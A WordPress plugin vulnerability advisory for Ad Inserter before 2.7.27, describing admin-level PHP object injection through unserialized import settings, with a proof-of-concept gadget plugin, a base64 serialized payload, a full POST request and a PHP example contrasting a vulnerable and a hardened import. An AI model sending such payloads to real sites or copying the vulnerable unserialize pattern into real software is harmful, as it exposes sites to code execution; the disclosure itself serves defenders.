WordPress Plugin Vulnerabilities

Ad Inserter < 2.7.27 - Admin+ PHP Object Injection

Description

The plugin unserializes user input provided via the settings page (the export_settings_N value that is submitted together with import_block_N, as shown in the proof of concept below), which could allow high-privilege users such as administrators to perform PHP Object Injection when a suitable gadget chain is present. The proof of concept supplies its own gadget; on a real target the impact depends on whether another plugin, theme or library loaded on the site provides one.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

<?php
/* Plugin Name: Evil Gadget (PoC) */

// Any magic method that runs during unserialize() will do; die() makes the
// trigger visible in the HTTP response.
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Activate it, then go to Settings > Ad Inserter, click the settings icon and finally click "Save Settings". This sends a POST request.
Add "&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9" to the body of that request. "Tzo0OiJFdmlsIjowOnt9" is the base64 encoding of O:4:"Evil":0:{}.

Then view the response to that request, which will contain the "Arbitrary deserialization" message.

---
POST /wordpress/wp-admin/options-general.php?page=ad-inserter.php HTTP/1.1
Host: {host}
Content-Length: 887
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}

block-parameters-1=WyJhaV9zYXZlIl0%3D&block-parameters-2=WyJhaV9zYXZlIl0%3D&block-parameters-3=WyJhaV9zYXZlIl0%3D&block-parameters-4=WyJhaV9zYXZlIl0%3D&block-parameters-5=WyJhaV9zYXZlIl0%3D&block-parameters-6=WyJhaV9zYXZlIl0%3D&block-parameters-7=WyJhaV9zYXZlIl0%3D&block-parameters-8=WyJhaV9zYXZlIl0%3D&block-parameters-9=WyJhaV9zYXZlIl0%3D&block-parameters-10=WyJhaV9zYXZlIl0%3D&block-parameters-11=WyJhaV9zYXZlIl0%3D&block-parameters-12=WyJhaV9zYXZlIl0%3D&block-parameters-13=WyJhaV9zYXZlIl0%3D&block-parameters-14=WyJhaV9zYXZlIl0%3D&block-parameters-15=WyJhaV9zYXZlIl0%3D&block-parameters-16=WyJhaV9zYXZlIl0%3D&ai_save=Save+Settings&syntax-highlighter-theme=ad_inserter&plugin-usage-tracking=1&ai-active-tab=%5B0%2C0%5D&_wpnonce=48546fc1cb&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dad-inserter.php&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9
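The pattern behind this finding and its usual fix, as an added PHP example that is neither Ad Inserter's code nor the researcher's PoC: import_settings_vulnerable() and import_settings_hardened() are hypothetical stand-ins for the import path (the plugin's real function names and settings format are not shown on this page), the benign settings array is constructed for the demo, and the gadget is the advisory's Evil class with die() swapped for a flag so both paths can run in one script.

```php
<?php
// Added example (not Ad Inserter's code, not the researcher's PoC): a
// stand-alone stand-in for the vulnerable pattern the advisory describes,
// user-controlled base64 -> unserialize(), next to a hardened import.
// Requires PHP 8. Run with: php objinj_demo.php
declare(strict_types=1);

// Gadget from the advisory. Instead of die() it records that it ran, so the
// script can continue and show the hardened path on the same payload.
class Evil {
    public static bool $fired = false;
    public function __wakeup(): void {
        self::$fired = true;
    }
}

// Hypothetical vulnerable import: mirrors the shape of the bug (any
// export_settings_N blob is decoded and unserialized without restriction),
// so every loaded class with __wakeup()/__destruct() becomes reachable.
function import_settings_vulnerable(string $b64): mixed {
    return unserialize(base64_decode($b64));
}

// Hardened import. allowed_classes => false turns any object in the stream
// into __PHP_Incomplete_Class without invoking magic methods; the array and
// scalar checks then reject anything that is not plain settings data.
function import_settings_hardened(string $b64): array {
    $raw = base64_decode($b64, true);            // strict: reject junk chars
    if ($raw === false) {
        throw new InvalidArgumentException('settings blob is not valid base64');
    }
    $data = unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('settings blob must decode to an array');
    }
    array_walk_recursive($data, static function ($v): void {
        if (!is_scalar($v) && $v !== null) {    // catches __PHP_Incomplete_Class
            throw new InvalidArgumentException('non-scalar value in settings');
        }
    });
    return $data;
}

// Payload exactly as in the advisory: base64(O:4:"Evil":0:{}).
$payload = base64_encode('O:4:"Evil":0:{}');
printf("payload: %s (matches advisory: %s)\n",
    $payload, $payload === 'Tzo0OiJFdmlsIjowOnt9' ? 'yes' : 'no');

// A benign blob of the kind an import should accept (constructed here).
$benign = base64_encode(serialize(['name' => 'Block 1', 'enabled' => true]));

// 1. Vulnerable path: the gadget runs during unserialize().
Evil::$fired = false;
import_settings_vulnerable($payload);
printf("vulnerable import, Evil::__wakeup fired: %s\n", Evil::$fired ? 'yes' : 'no');

// 2. Hardened path on the same payload: rejected, no magic method executed.
Evil::$fired = false;
try {
    import_settings_hardened($payload);
    echo "hardened import: accepted (unexpected)\n";
} catch (InvalidArgumentException $e) {
    printf("hardened import: rejected (%s), fired: %s\n",
        $e->getMessage(), Evil::$fired ? 'yes' : 'no');
}

// 3. Hardened path on the benign blob: accepted and returned as an array.
print_r(import_settings_hardened($benign));
```

Two things worth noting when reviewing a fix like this. First, the request above carries a valid _wpnonce, so the issue is not CSRF: a legitimate, admin-only form is simply feeding unserialize(), which is why the advisory is rated Admin+. Second, allowed_classes => false is the minimal change that keeps the serialized format; if the format can change, serialising settings as JSON removes the class-instantiation surface entirely rather than fencing it.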

Affects Plugins

Fixed in 2.7.27

Classification

Type
OBJECT INJECTION

Miscellaneous

Original Researcher
Nguyen Huu Do
Submitter
Nguyen Huu Do
Verified
Yes

Timeline

Publicly Published
2023-04-19
Added
2023-04-19
Last Updated
2023-04-19